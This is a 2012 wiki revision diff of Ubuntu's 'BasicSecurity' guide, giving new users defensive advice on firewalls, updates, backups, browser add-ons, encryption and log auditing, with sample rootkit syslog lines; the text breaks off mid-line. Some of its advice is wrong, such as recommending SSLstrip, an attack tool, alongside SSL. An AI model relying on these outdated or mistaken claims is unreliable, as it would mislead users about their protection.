BasicSecurity
|
Size: 35671
Comment:
|
← Revision 121 as of 2012-12-28 10:50:07 ⇥
Size: 24152
Comment:
|
| Deletions are marked like this. | Additions are marked like this. |
| Line 4: | Line 4: |
| Security is a very broad, potentially daunting subject to a new Ubuntu user. It's crazy to think that anyone can boil security down to a list of 7 things. So we didn't even try. Instead, our goal is to present a listing of the most basic security concepts that can be fairly easily implemented while you learn. This guide was inspired and written by several new users of Ubuntu who were very interested in learning how to hack around their brand new Ubuntu operating systems. We were lucky enough to have some security professionals collaborate with us. But we still don't claim that we will reduce your risk to zero. We are presenting a pragmatic approach to security.<<BR>><<BR>> | Security is a very broad, potentially daunting subject to a new Ubuntu user. It's crazy to think that anyone can boil security down to a list of 7 things. So we didn't even try. Instead, our goal is to present a listing of the most basic security concepts that can be fairly easily implemented while you learn. This guide was inspired and written by several new users of Ubuntu who were very interested in learning how to hack around their brand new Ubuntu operating systems. We were lucky enough to have some security professionals collaborate with us. But we still don't claim that we will reduce your risk to zero. We are presenting a pragmatic approach to security.<<BR>> |
| Line 9: | Line 9: |
| = The most basic set of rules = If you're a simple desktop user who only uses his computer for the most ordinary things, then this is the basic rule set:<<BR>> 1. immediately install security updates when you're notified;<<BR>> 2. do not install antivirus, as you *really* don't need it in Linux;unless you share files with Windows<<BR>> 3. enable the firewall (sudo ufw enable) without further tweaks;<<BR>> 4. stick to the official repo's as much as possible, and only deviate from them when strictly necessary and with much caution;<<BR>> 5. keep Java (both openJDK and Oracle Java) disabled by default in your browser, and only enable it when needed;<<BR>> 6. use Wine with caution;<<BR>> 7. and most important of all: use your common sense. The biggest security threat is generally found between keyboard and chair.<<BR>> <<BR>> If you have higher security needs, then read on. |
|
| Line 11: | Line 23: |
| In order to simplify the very complex world of security, we have broken it down into two sections. In this first section, we will discuss security tools in Ubuntu that you can configure and do not require a lot of interaction from you. We will also discuss general security concepts that are easy to implement into your daily computer use. There is a lot of existing security information already in existence in the Ubuntu Wikis and stickies in the [[ubuntuforums.org | Ubuntu Forums]]. There are some great resources there, in fact [[http://ubuntuforums.org/showthread.php?t=510812|one of the best guides is linked here]]. But a lot of that material will seem complex to the new Ubuntu user - so the goal of this guide was to take the existing material and simplify it, making it possible to bridge the gap.<<BR>><<BR>> | In order to simplify the very complex world of security, we have broken it down into two sections. In this first section, we will discuss security tools in Ubuntu that you can configure and (once configured) require little interaction. We will also discuss general security concepts that are easy to implement into your daily computer use. There is a lot of existing security information already in existence in the Ubuntu Wikis and stickies in the [[ubuntuforums.org | Ubuntu Forums]]. There are some great resources there, in fact [[http://ubuntuforums.org/showthread.php?t=510812|one of the best guides is linked here]]. But a lot of that material will seem complex to the new Ubuntu user - so the goal of this guide was to take the existing material and simplify it, making it possible to bridge the gap.<<BR>><<BR>> |
| Line 15: | Line 27: |
| We've all heard the argument that if you make a system secure, you also hinder access, create obstacles, and complicate use. It is up to the individual user to determine what his tolerance for risk is. This Wiki will outline vectors of potential vulnerabilities in your Ubuntu system. You have the right to choose not to defend against them, but do so only after first understanding them. <<BR>><<BR>> | We've all heard the argument that if you make a system secure, you also hinder access, create obstacles, and complicate use. '''It is up to the individual user to determine what his tolerance for risk is.''' This Wiki will outline vectors of potential vulnerabilities in your Ubuntu system, and you can evaluate them and determine how those risks relate to your personal situation. <<BR>><<BR>> |
| Line 19: | Line 31: |
| In very general, broad terms, Windows is more targeted than Linux or Mac when it comes to malicious attacks aimed at mass victims. But a determined hacker can just as easily crack a Linux machine as any other. There are known [[https://help.ubuntu.com/community/Linuxvirus|viruses]] and [[http://www.ubuntu.com/usn|vulnerabilities]] that you need to defend against. <<BR>><<BR>> | The majority of new users are coming from Windows environments, where security focuses mostly on anti-virus software. To understand security on Ubuntu, you must shift your thinking from this point of view. In the following bullets, we're going to analyze what threats actually effect you as a Ubuntu user. |
| Line 21: | Line 33: |
| * '''Myth''': If I install an anti-virus program I'll be fine.<<BR>> | |
| Line 22: | Line 35: |
| === Myth VS. Reality === It is quite common that many Ubuntu users will parrot the phrase “Ubuntu is Secure”. Now we're not here to spread those ever popular words, Fear, Uncertainty, and Doubt. However since you're reading this you obviously have an interest in security, and probably have guessed that nothing is truly secure. That being said, we're going to analyze what threats ACTUALLY effect you as a Ubuntu user. We're going to address several common myths, misnomers and misunderstandings about how Ubuntu protects you, or in some cases doesn't protect you.<<BR>><<BR>> |
* '''Reality''': At the time of writing, there are no known viruses on the big bad web designed to target Linux. A few targeting Windows can execute in a manner that could allow compromise of a Linux system via an interpreter layer like [[https://help.ubuntu.com/community/Wine|Wine]]. Very few people recommend existing anti-virus software for Linux machines, in part because there are few decent free anti-malware solutions available. Enterprise class solutions are good, but the consumer-grade products aren't on par with their Windows counterparts enough to warrant their use. Moreover, if you focus entirely on viruses then you are ignoring the vast majority of real threats to your Ubuntu machine. <<BR>> |
| Line 28: | Line 39: |
| * '''Reality''': Linux/Ubuntu aren't really all that obscure to “crackers”. They may be obscure to you or your friends, however, there are many who know how to exploit Linux vulnerabilities just as easy as Windows, Mac OSX, Solaris, AIX, or any other operating system's vulnerabilities. The best defense is knowledge and preparation. Relying on an “obscure” operating system to hide behind is NOT a good strategy.<<BR>> | * '''Reality''': It's a favoured argument from Linux supporters, but Linux/Ubuntu is not that obscure to “crackers”. They may be obscure to you or your friends, however, there are many who know how to exploit Linux vulnerabilities just as easy as Windows, Mac OSX, Solaris, AIX, or any other operating system's vulnerabilities. The best defence is knowledge and preparation. Relying on an “obscure” operating system to hide behind is NOT a good strategy.<<BR>> |
| Line 32: | Line 43: |
| * '''Reality''': While the above statement does carry some weight in that most malware targets Windows, it neglects to mention that an entire spectrum of web based attack vectors exist that are operating-system-agnostic in nature. Cross Site Scripting, Cross Site Request Forgery, Click-Jacking, Session Riding, and many other methods can be used to exploit weaknesses in a relationship of trust between you and a website, or a website and you, regardless of your operating system. For things like this we have browser add-ons which will be discussed in the [[browser]] security section.<<BR>> | * '''Reality''': While the majority of malware does target Windows, this statement overlooks the fact that an entire spectrum of web based attack vectors exist that work on '''any''' operating system. Cross Site Scripting, Cross Site Request Forgery, Click-Jacking, Session Riding, and many other methods can be used to exploit weaknesses in a relationship of trust between you and a website, or a website and you, regardless of your operating system. For things like this we have browser add-ons which will be discussed in the browser security section.<<BR>> |
| Line 34: | Line 45: |
| * '''Myth''': I don't need to use fancy browser add-ons or SSL when using public access wifi because I use Ubuntu.<<BR>> | * '''Myth''': I don't need to use fancy browser add-ons when using public access wifi because I use Ubuntu.<<BR>> |
| Line 36: | Line 47: |
| * '''Reality''': While I haven't seen this statement made quite as often, it is completely absurd. Most attacks carried out on public wifi include several varieties of man in the middle attacks, as well as multiple methods for credential theft (both for SSL and unencrypted traffic). If you absolutely have to or want to utilize public wifi, it is highly discouraged to do anything less than trivial in nature with it. If you must do important tasks such as banking while on public access wifi, it is recommended that you invest in VPN access, or create an SSH forward to your home machine prior to performing such tasks. If you just can not use those, it is imperative that you at least use SSL, though this can still be broken with an airbase attack. Used in conjunction with SSLstrip, it will at least afford you some extra protection.<<BR>> | * '''Reality''': An absurd statement. Most attacks carried out on public wifi include several varieties of [[http://en.wikipedia.org/wiki/Man-in-the-middle_attack|man in the middle attacks]]. If you want to utilize public wifi, it is highly discouraged to do anything more than trivial in nature with it unless you are an advanced user and you know how to set up a [[http://www.howstuffworks.com/vpn.htm|virtual private network (VPN)]], a [[https://help.ubuntu.com/community/SSH_VPN|VPN via Secure Shell (SSH)]], or use [[http://searchsecurity.techtarget.com/definition/Secure-Sockets-Layer-SSL|Secure Sockets Layer (SSL)]] in conjunction with SSLstrip.<<BR>> |
| Line 40: | Line 51: |
| * '''Reality''': This is a matter of tolerance for risk. Added protection, particularly that which takes only a few minutes to set up, is always worth it. There are many points made in the several links discussing [[firewalls]] later in this document that explain why a firewall is a good thing to have, and what type of rules it should utilize. Ultimately the choice on that is yours. <<BR>> | * '''Reality''': This is a matter of risk tolerance. Added protection, particularly that which takes only a few minutes to set up, is always worth it. Firewalls are discussed in more depth later in this document. <<BR>> |
| Line 44: | Line 55: |
| * '''Reality''': While this is mostly a gag joke discussed on nix forums, the reality is that Ubuntu CAN be compromised by Windows malware if you're using Wine. This is not to say that Windows malware can infect a Linux system directly, however it CAN, if targeted properly, utilize the Wine interpreter to send system calls to the Linux kernel. This is a very rare case, and it is highly unlikely that it would occur as it would be a very targeted attack. But for completeness sake we should mention that it CAN happen. <<BR>> | * '''Reality''': Ubuntu CAN be compromised by Windows malware if you're using [[https://help.ubuntu.com/community/Wine|Wine]]. This is not to say that Windows malware can infect a Linux system directly, however it CAN, if targeted properly, utilize the Wine interpreter to send system calls to the Linux kernel. This is a very rare case, and it is highly unlikely that it would occur as it would be a very targeted attack. But for completeness sake we should mention that it CAN happen. <<BR>> |
| Line 46: | Line 57: |
| * '''Myth''': Ubuntu is harder to exploit than Windows, Mac OSX, whatever else.<<BR>> | * '''Myth''': Ubuntu is harder to exploit than Windows, Mac OSX, whatever else - and it's targeted less than those other operating systems as well.<<BR>> |
| Line 48: | Line 59: |
| * '''Reality''': Not really, the process of discovering a vulnerability and exploiting it is pretty much the same across the board. <<BR>> | * '''Reality''': The process of discovering a vulnerability and exploiting it is pretty much the same across the board, regardless of operating system. <<BR>> |
| Line 50: | Line 61: |
| * '''Myth''': Well its not targeted as much as Windows.<<BR>> | These are just some common myths associated with Ubuntu and security. This list is not comprehensive, but it covers the largest misconceptions held by new users. This does not mean that Ubuntu is inherently insecure, or is less secure than previous versions, or is more/less secure than any other operating system. It is just an effort to dispel common myths and get the reader (you) thinking in a positive direction toward improving their system's security posture. If you follow the steps in this Wiki, you will have a decent defense built to protect your machine from viruses as well as the other more pressing threats out there.<<BR>> |
| Line 52: | Line 63: |
| * '''Reality''': On the home front maybe not, however if you happen to be running services on your home network's Ubuntu machine, perhaps a game server or an ftp server, you might find yourself becoming the target of a cracking attempt.<<BR>><<BR>> These are just some common myths associated with Ubuntu and security. This list is not comprehensive, but it covers the largest faux pas made by new users. Again, none of this is saying that Ubuntu is inherently insecure, or is any less secure than it has been in the past, or any other operating system is for that matter. It is just an effort to dispel common myths and get the reader (you) thinking in a positive direction toward improving their system's security posture.<<BR>><<BR>> |
And of course, we'd be remiss not to mention social engineering. What information you're putting into public view? Do you know who you're giving valuable information to? [[http://searchsecurity.techtarget.com/definition/social-engineering|Social engineering]] is important to understand but beyond the scope of this Wiki.<<BR>> |
| Line 59: | Line 67: |
| Reinstalling an OS again after it corrupts is annoying. But losing valuable personal pictures, letters, emails...they are priceless! If you are prepared to wipe and reinstall with very little notice, then you are far more secure. Moreover, there are many threads in the Ubuntu Forums that describe problems that would have been avoided if the user had [[https://help.ubuntu.com/community/BackupYourSystem|made good backups]]. It is also important to make special backup before certain risky operations like upgrading to a new version, operations on partitions and partition tables, using dd, etc. And if you're concerned that your computer has been infected or "cracked," then you can restore Ubuntu to a known previously good state. <<BR>><<BR>> | Reinstalling an operating system again after it corrupts is annoying. But losing valuable personal pictures, letters, emails... these are priceless and cannot be replaced. If you are prepared to wipe and reinstall with very little notice, then you are far more secure. Moreover, there are many threads in the Ubuntu Forums that describe problems that would have been avoided if the user had [[https://help.ubuntu.com/community/BackupYourSystem|made good backups]]. It is important to make special backups before certain risky operations like upgrading to a new version, operations on partitions and partition tables, using dd, etc. Finally, if you're concerned that your computer has been infected or "cracked," then you can restore Ubuntu to a known previously good state. <<BR>> |
| Line 61: | Line 69: |
| To quote the introduction of [[https://help.ubuntu.com/community/DuplicityBackupHowto|this]], "There are many different applications that are available to backup Ubuntu. Each one has its strengths and weaknesses. Some are made for enterprise environments where it is necessary to back up many computers quickly and efficiently. Others are made for home environments and come with a simple wizard-driven GUI interface. Still others need to be accessed with the command line.<<BR>><<BR>> "Besides the interfaces of various backup applications, these applications have varied functions. For example, a particular application can backup to one or many DVDs, CDs, disk drives, FTP sites, SMB drives, and other media or may not backup to one or more of those things. As varied as these programs are, so are the needs of the individuals who use them." [[https://help.ubuntu.com/community/jmburgess/Backup|This link]] can help you decide where to backup your data, what to backup, and when. <<BR>><<BR>> |
To quote the introduction of [[https://help.ubuntu.com/community/DuplicityBackupHowto|Duplicity Backup]], "There are many different applications that are available to backup Ubuntu. Each one has its strengths and weaknesses. Some are made for enterprise environments where it is necessary to back up many computers quickly and efficiently. Others are made for home environments and come with a simple wizard-driven GUI or command line interface...Each application can backup to one or many DVDs, CDs, disk drives, and other media or may not backup to one or more of those things. As varied as these programs are, so are the needs of the individuals who use them." [[https://help.ubuntu.com/community/jmburgess/Backup|This link]] can help you decide where to backup your data, what to backup, and when. <<BR>><<BR>> |
| Line 68: | Line 74: |
| Strong unique passwords for each account is best - consider using a password safe (but remember that that password MUST be a good one!) There's enough material on the subject of passwords to keep even the most busy of readers occupied for a few hours. You can use an [[https://www.grc.com/passwords.htm|automatic creator of strong passwords to help understand how complex passwords can be]]. You can [[https://www.grc.com/haystack.htm|test your password here]]. And here are [[https://help.ubuntu.com/community/StrongPasswords|more tips on creating good passwords - including why using an on-line automatic password creator is bad]]. Remember to beware of on-line sites where they offer to test password strength. To the uninitiated: remember that these sites have your IP Address as well as your potential password and/or methods you use to construct them. How do you know that a malicious script designed to collect this information is not running from the site? When you use these site, remember that you are giving someone you don't know your password. Beware who your trust with your information. <<BR>><<BR>> | Obviously if an attacker doesn't have your password, then it's harder for him to make changes on your machine. A strong unique password for each account is best - consider using a password safe (but remember that that password MUST be a good one!) [[http://www.cs.umd.edu/faq/Passwords.shtml|Read this discussion]] regarding the process of choosing a good password. <<BR>><<BR>> |
| Line 73: | Line 79: |
| If you're following a set of instructions and you're about to type in sudo, ask yourself "Do I REALLY know what this command is about to do?" If you can't explain it to your granny, then you don't know what's going to happen. Related to that - if you get asked for your password, make sure you know what you've just done to trigger that response. The system is trying to protect you. Here is an [[https://help.ubuntu.com/community/RootSudo|explaination of sudo]] <<BR>><<BR>> | If you're following a set of instructions and you're about to type in sudo, ask yourself "Do I REALLY know what this command is about to do?" If you can't explain it to your grandmother, then you don't know what's going to happen. Related to that - if you get asked for your password, make sure you know what you've just done to trigger that response. The system is trying to protect you. Here is an [[https://help.ubuntu.com/community/RootSudo|explaination of sudo]] <<BR>><<BR>> |
| Line 77: | Line 83: |
| An excellent way to find yourself in deep trouble is to modify permissions as root. Logging in as root means you will be browsing the Internet as root, drive by downloads (downloads that you did not authorize or that you authorized but did not realize the consequence behind), malicious scripts can all now execute with root permission. Default settings in Ubuntu will not allow you to log in as root. Don't change that unless you fully understand the consequences. <<BR>><<BR>> | An excellent way to find yourself in deep trouble is to modify permissions as root. Logging in as root means you will be browsing the Internet as root, drive by downloads (downloads that you did not authorize or that you authorized but did not realize the consequence behind), malicious scripts can all now execute with root permission. Default settings in Ubuntu will not allow you to log in as root. <<BR>><<BR>> |
| Line 81: | Line 87: |
| You can encrypt your home folder or the [[ttps://help.ubuntu.com/community/EncryptedFilesystemHowto|entire hard drive]] on first install. Alternatively you can [[https://help.ubuntu.com/community/EncryptedHome|click here]] and [[http://ubuntuforums.org/showthread.php?t=1449168|here]] to learn how to add encryption to your home folder after installation. You could even just encrypt a particular file, a sub-directory, a usb stick... the choices are endless. WARNING: if you lose the password then your chances of recovering the data drop to almost nil.<<BR>><<BR>> | Encrypting the home folder will help for physical security. If someone is able to sit down in front of your computer or if they steal it, they won't be able to see the files in your home folder. In Ubuntu when you encrypt the home folder, the folder mounts when you log in which makes it readable to anyone sitting in front of your computer. Once you log out, the home folder unmounts and is encrypted again. Encrypting the home folder will do nothing to protect you from on-line threats. As long as the encrypted folder is mounted, it will be plain text for anyone with access. You can encrypt your home folder or the [[https://help.ubuntu.com/community/EncryptedFilesystemHowto|entire hard drive]] on first install. Alternatively you can [[https://help.ubuntu.com/community/EncryptedHome|click here]] and [[http://ubuntuforums.org/showthread.php?t=1449168|here]] to learn how to add encryption to your home folder after installation. You could even just encrypt a particular file, a sub-directory, a usb stick... the choices are endless. <<BR>> There are risks with encryption, so carefully evaluate your personal situation to determine if it is right for you. If you lose the password then your chances of recovering the data drop to almost nil. You should also keep in mind that if you encrypt your home folder or hard drive, that if your system fails later on it will be harder to recover your files. You will have to consider the value of the data you store on your computer to determine if encryption is worth the risk. For instance, if you insist on saving a detailed list of all your financial accounts in a text file, then encryption is vital. But if you don't store anything of personal value on the hard drive, then encryption may be less necessary. <<BR>><<BR>> |
| Line 85: | Line 95: |
| Always make sure you are utilizing the least amount of privileges/permissions to do the task necessary. Use only what you need, nothing more. '''If you are surfing the net and come across a "drive-by download" site, if your privileges are not elevated then it is less likely to execute. IS THIS TRUE?''' Learn how to use file permissions and non-privileged users (which Ubuntu makes very easy). Also consider enabling guest accounts if you think they are necessary. Here is a link to [[https://help.ubuntu.com/community/FilePermissions|everything you need to know about file permissions]]. <<BR>><<BR>> | Always make sure you are using the least amount of privileges/permissions to do the task necessary. Use only what you need, nothing more. If you are surfing the net and come across a "drive-by download" site, then what the malicious program has access to changes dramatically if it has lowered privileges. Learn how to use file permissions and non-privileged users (which Ubuntu makes very easy). Here is a link to [[https://help.ubuntu.com/community/FilePermissions|everything you need to know about file permissions]]. Also consider enabling guest accounts if you will have other people using your computer.<<BR>><<BR>> |
| Line 90: | Line 100: |
| Security updates are released by Ubuntu developers when they discover and patch vulnerabilities. If you don't install the updates then you retain the vulnerability. Ubuntu allows you to have security updates installed - once configured you don't need to run security updates manually again. In the GUI, search for the Update Manager on your desktop and click on "settings" to configure how you want Ubuntu to manage updates. Or you can configure [[https://help.ubuntu.com/community/AutomaticSecurityUpdates|automatic updates via terminal]]. <<BR>><<BR>> | Security updates are released by Ubuntu developers when they discover and patch vulnerabilities. If you don't install the updates then you retain the vulnerability. Ubuntu allows you to have security updates automatically installed - once configured you don't need to run security updates manually again. Search for the Update Manager on your desktop and click on "settings" to configure how you want Ubuntu to manage updates. Or you can configure [[https://help.ubuntu.com/community/AutomaticSecurityUpdates|automatic updates via terminal]]. <<BR>><<BR>> |
| Line 94: | Line 104: |
| Don't run services you don't need. Do you really need a VOIP phone system? What about SSH, VNC, Apache? If you need a service, make sure you understand it and can properly secure it. You can't secure what you don't understand. (We hope that is starting to sound familiar.) <<BR>> <<BR>> | Don't run services you don't need. Do you really need a VOIP phone system? What about Secure Shell (SSH), Virtual Network Computing (VNC), Apache server? If you need a service, make sure you understand it and can properly secure it. You can't secure what you don't understand. <<BR>> <<BR>> |
| Line 98: | Line 108: |
| <<Anchor(browser)>>One of the best things you can do is secure your browser, especially as it's one of the most vulnerable parts of your system as a home user. We will discuss Firefox because that's the browser packaged in Ubuntu. However, other browsers have similar features. | The majority of threats to your machine come from your browser, even when you use common sense. You have absolutely no control over vulnerabilities on someone else's web page as an end user, so it's important to defend yourself against any malicious activity originating from a compromised web page. If you are interested in learning how browser exploits happen, you can read [[https://www.owasp.org/index.php/Top_10_2010-Main|this summary of the top ten vulnerabilities]] in a poorly designed web page. <<BR>> |
| Line 100: | Line 110: |
| * '''Preferences''': Find Preferences in the menu bar of Firefox. Choose not to "accept cookies", whitelist sites for specific needs using exceptions, allow for session at most; clear history when closing the browser. Choose "never remember history." Don't use "hardware acceleration". | Secure your browser. We will discuss Firefox because that's the browser packaged in Ubuntu. However, other browsers have similar features. We recommend that you use the following services. As mentioned before, these measures may inhibit functionality until you manually configure them. Again you must weigh the need for security against the need for functionality as it relates to your personal situation.<<BR>> |
| Line 102: | Line 112: |
| * '''about:config''' --I'm pretty sure there's something in here where you can disable the ability to run scripts directly from the URL bar, that's probably important | === Preferences === |
| Line 104: | Line 114: |
| * [[https://addons.mozilla.org/en-US/firefox/addon/noscript/|Noscript]] prevents scripts (i.e. programs) from running on your system unless you allow them. Allow scripts from sites that you trust for a safer browsing experience. But don't "allow all scripts globally" under any circumstances! You can add a "revoke temporary permissions" button to the toolbar, and you can disable WebGL. | Find Preferences in the menu bar of Firefox. Under the privacy tab you can tell web sites you don't want to be tracked and you can choose to never remember history. You can choose to whitelist sites for specific needs using exceptions, allow for session at most; clear history when closing the browser. Choose "never remember history" so that if someone hijacks your browser section, they won't find any valuable stored data. Don't use "hardware acceleration". <<BR>> |
| Line 106: | Line 116: |
| * [[https://addons.mozilla.org/en-US/firefox/addon/adblock-plus/?src=ss|Adblock Plus]]: You can tell by the name that it (surprise!) blocks ads. Adblock Plus provides a default list of blocked ads. Additionally, you can block any individual ads or scripts that show up by adding them manually. | === NoScript === |
| Line 108: | Line 118: |
| * '''BetterPrivacy''': remove all LSOs when closing the browser (and after every known use of Flash content). Can add a button to the toolbar to make it easy to call up. | If you unknowingly visit a compromised website, this will prevent scripts (i.e. programs) from running on your system. It can be a tricky tool to use at first glance as it blocks all scripts from running at first. If you spend a little time getting familiar with [[https://addons.mozilla.org/en-US/firefox/addon/noscript/|NoScript]], you will find it easier to use. As a user, you tell NoScript what sites to partially or fully trust. Don't "allow all scripts globally" under any circumstances! <<BR>> |
| Line 110: | Line 120: |
| * '''RefControl''': strips out referrer headers, makes some malicious sites think you're a search bot or malware researcher, and otherwise stops the collection of referral information. | Configuring NoScript is notoriously daunting to the new user. A helpful guide to configure NoScript is included on a separate page, [[https://wiki.ubuntu.com/BasicSecurity/NoScript]]. |
| Line 112: | Line 122: |
| * '''RequestPolicy''': not for lightweights, very similar to NoScript and probably has some redundancy, good for an education in how pages on the web actually load/function | === AdBlockPlus === |
| Line 114: | Line 124: |
| * '''Plugins''': disable Java/OpenJDK plugins, disable plugin to load PDFs in the browser window | You can tell by the name that it (surprise!) blocks annoying ads, but it can also block those ads from collecting personal information about you. [[https://addons.mozilla.org/en-US/firefox/addon/adblock-plus/|Adblock Plus]] provides a default list of blocked ads. Additionally, you can block any individual ads or scripts that show up by adding them manually. <<BR>> |
| Line 116: | Line 126: |
| * '''BleachBit''' -use it after every browsing session. <<BR>><<BR>> |
=== BetterPrivacy === |
| Line 119: | Line 128: |
| == Firewall == | The add-on [[https://addons.mozilla.org/en-US/firefox/addon/betterprivacy/|BetterPrivacy]] will prevent websites from installing “super cookies” on your computer designed to track your history for marketing research. <<BR>> |
| Line 121: | Line 130: |
| <<Anchor(firewalls)>>There is a lot of existing information about firewalls - along with a long-term raging debate on the need of a firewall on Ubuntu. We recommend you enable it because you have ports open if you are reading this page. Traffic can go in and out of that port unhindered without a firewall. Malicious programs can open arbitrary ports unless you have a firewall to prevent that. A NAT router can add a layer of protection, but it will not protect you in lieu of a firewall. Still not convinced you need a firewall? Then [[http://ubuntuforums.org/showthread.php?t=1871177|read this]]. <<BR>><<BR>> | === ClickClean === |
| Line 123: | Line 132: |
| Use your firewall PROPERLY. Don't set it and forget it, learn how it works, set decent rules.[[http://ubuntuforums.org/showthread.php?t=1876124|Here]] is a tutorial showing how to enable a firewall in Ubuntu. However, adding port numbers can feel confusing. It if helps, think of it this way - currently you're reading this guide because you accessed a webpage hosted by wiki.ubuntu.com. To make the connection (and therefore to see the content) you have to connect your browser to that website by accessing Port 80. Another example is when you pick up your email. Your computer makes a connection to your mail server on Port 110. The other port numbers that you are adding provide similar functions. | [[https://addons.mozilla.org/en-US/firefox/addon/clickclean/|ClickClean]] is a simple tool to delete your browsing history, erase all temporary internet files, remove downloaded files history, cookies, Flash LSO, typed URLs. Allows for automatic deletion of private data when Firefox closes. Basically if your browser session is ever hijacked, then the hijacker will get little valuable information. <<BR>><<BR>> |
| Line 125: | Line 134: |
| <<BR>><<BR>> | The importance of securing your browser cannot be overstated. We've listed some of the simple tools you can implement to drastically improve your security. There are numerous others aimed at security as well as privacy, we encourage you to research those. <<BR>><<BR>> |
| Line 128: | Line 138: |
| We encourage you to learn more about securing your home network if you choose to set one up. You can't secure what you don't understand. The [[http://www.cert.org/tech_tips/home_networks.html#I-A|CERT Guide to Home Network Security]] provides an excellent overview of the basic principles of networking and the internet. Learn some of the fundamentals [[http://compnetworking.about.com/od/wirelesssecurity/tp/wifisecurity.htm|about securing your router]]. For instance, if you use ''wireless access'', make sure you're using STRONG encryption: not WEP but WPA/WPA2. Use a GOOD password consisting of all 63 characters, you only have to type it once anyway.<<BR>><<BR>> | Most computer users at home have a local network...often without even realising it. We encourage you to learn more about securing your home network - again, you can't secure what you don't understand. The [[http://www.cert.org/tech_tips/home_networks.html#I-A|CERT Guide to Home Network Security]] provides an excellent overview of the basic principles of networking and the internet. Learn some of the fundamentals [[http://compnetworking.about.com/od/wirelesssecurity/tp/wifisecurity.htm|about securing your router]]. For instance, if you use ''wireless access'', make sure you're using STRONG encryption: not WEP but WPA/WPA2. Use a GOOD password consisting of all 63 characters, you only have to type it once anyway.<<BR>> |
| Line 131: | Line 141: |
| Line 140: | Line 149: |
| So that was the "easy" stuff. True security is an ongoing process, and a lot of the really good security tools require regular interaction from you. The next tools we describe are more advanced because you cannot "set and forget" them. The more security measures you implement from this Wiki, the more secure you will be. <<BR>><<BR>> | So that was the "easy" stuff. True security is an ongoing process, and a lot of the really good security tools require regular interaction from you. The next tools we describe are more advanced because you cannot "set and forget" them. They also require more effort to setup and use effectively, but the effort is worth it. The more security measures you implement from this Wiki, the more secure you will be. <<BR>><<BR>> |
| Line 142: | Line 151: |
| == Firewall == <<Anchor(firewalls)>>There is a lot of existing information about firewalls - along with a long-term raging debate on the need of a firewall on Ubuntu. We recommend you enable it because you have ports open if you are reading this page. Traffic can go in and out of that port unhindered without a firewall. Malicious programs can open arbitrary ports unless you have a firewall to prevent that. A NAT router can add a layer of protection, but it will not protect you in lieu of a firewall. [[http://ubuntuforums.org/showthread.php?t=1871177|This additional guide]] will provide more information. <<BR>> Use your firewall PROPERLY. Don't set it and forget it, learn how it works, set decent rules.[[https://wiki.ubuntu.com/BasicSecurity/Firewall|Here]] is a tutorial showing how to enable a firewall in Ubuntu. However, adding port numbers can feel confusing. It if helps, think of it this way - currently you're reading this guide because you accessed a webpage hosted by wiki.ubuntu.com. To make the connection (and therefore to see the content) you have to connect your browser to that website by accessing Port 80. Another example is when you pick up your email. Your computer makes a connection to your mail server on Port 110. The other port numbers that you add provide similar functions.<<BR>><<BR>> |
|
| Line 145: | Line 159: |
| AppArmor can strengthen our security. To quote the Novell site, "AppArmor is designed to provide easy-to-use application security for both servers and workstations. Novell AppArmor is an access control system that lets you specify per program which files the program may read, write, and execute. AppArmor secures applications by enforcing good application behavior without relying on attack signatures, so it can prevent attacks even if they are exploiting previously unknown vulnerabilities." AppArmor has a pretty steep learning curve for new users. However, once you master it, creating profiles for most applications is fairly simple. It only gets tricky when you deal with apps that have to change functions a lot (for instance, Apache). [[http://ubuntuforums.org/showthread.php?t=1008906|Here]] is a tutorial on AppArmor. <<BR>><<BR>> | AppArmor can strengthen our security. To quote the Novell site, "AppArmor is designed to provide easy-to-use application security for both servers and workstations. Novell AppArmor is an access control system that lets you specify per program which files the program may read, write, and execute. AppArmor secures applications by enforcing good application behavior without relying on attack signatures, so it can prevent attacks even if they are exploiting previously unknown vulnerabilities." AppArmor has a pretty steep learning curve for new users. However, once you master it, creating profiles for most applications is fairly simple. It only gets tricky when you deal with applications that have to change functions a lot (for instance, Apache). [[http://ubuntuforums.org/showthread.php?t=1008906|Here is a tutorial on AppArmor]]. <<BR>><<BR>> |
| Line 147: | Line 161: |
| == Did I Just Get Owned? == | ----- = Did I Just Get Owned? = |
| Line 149: | Line 164: |
| A very popular question on the Ubuntu Forum is "I saw this output on a log. Is it bad?" This section will cover the basics of log auditing so that you can begin to understand which log output is concerning and which is probably harmless. We will also show you how to keep an eye on different aspects of your system in order to make sure you haven't gotten "owned". | For a helpful guide created by Dangertux which can help you determine if you have been compromised, see this page:<<BR>> [[https://wiki.ubuntu.com/BasicSecurity/DidIJustGetOwned]] ----- |
| Line 151: | Line 168: |
| Logging is an incredibly powerful feature. It can give you intelligence on how an attack was carried out and the extent of the compromise. As such if your system is cracked, the first place a cracker will go after gaining root on the system will be to sanitize your log files. One of the quickest ways to determine if your system was compromised is if your key log files are tampered with. It's often glaringly obvious that a log file has been altered. Important signs to note in your log files when checking for tampering are the following: * '''Incorrect time stamps''': Many times attackers will copy and paste legitimate log files over the existing log, this will create impropriety in that the log will not be from the time it was supposed to be. * '''Completely sanitized''': If the log file is completely gone, it is time to start suspecting something is up. Log files don't just disappear. * '''Partially sanitized''': If large chunks of time (more than 5 minutes) are unaccounted for in a log file while the machine was running, it is a safe bet something has happened that someone didn't wish to be seen. If you see any of the above signs it's time to do some further digging. It would be safe to assume the machine may be compromised. Now let's take a look at some of your key logs and auditing methods for determining a system compromise. === Log File Viewer === Ubuntu provides a convenient graphical log viewer for newer users. It can be found in Administration > Log File Viewer (On 10.04.3 LTS). Otherwise all the log files mentioned can be found in {{{/var/log}}} and viewed using commands such as {{{cat}}}, {{{more}}}, {{{less}}}, {{{head}}}, and {{{tail}}}. {{http://dangertux.no-ip.org/downloads/logviewer.png}} === syslog === Syslog can be invaluable when trying to detect a compromised service or a possibly rooted system. It logs all events at the system level, including kernel behavior and activity. Often times when a service is compromised it will cause the service to crash. This crash may or may not yield remote code execution. You may notice your system is behaving weirdly. If you are running several services on your machine, particularly services frequent to buffer overflow type attacks (applications that accept user input, either in the form of files or data), this file can be helpful in determining if a "crash" or segmentation fault has occurred. Now it's important to note that a seg fault in and of itself does not mean your system was compromised. Sometimes an application will seg fault all on its own with no help. However, if you notice other interesting phenomena that are unexplained, it might be a good place to start. Here is an example seg fault from the mysql service: {{{[Mon Aug 29 14:51:14 2011] [notice] child pid 22622 exit signal Segmentation fault (11)}}} You can also notice naughty activity when a rootkit is hooking kernel space memory in syslog. Here is an example of the phalanx rootkit hooking the Linux kernel and the last syslog entry associated with it : {{{Nov 7 21:27:40 dangertux-laptop kernel: [ 7549.229981] phalanx[27964]: segfault at 763405 ip 080490ee sp bfe940b0 error 4 in phalanx[8048000+5000]}}}<<BR>> {{{Nov 7 21:28:09 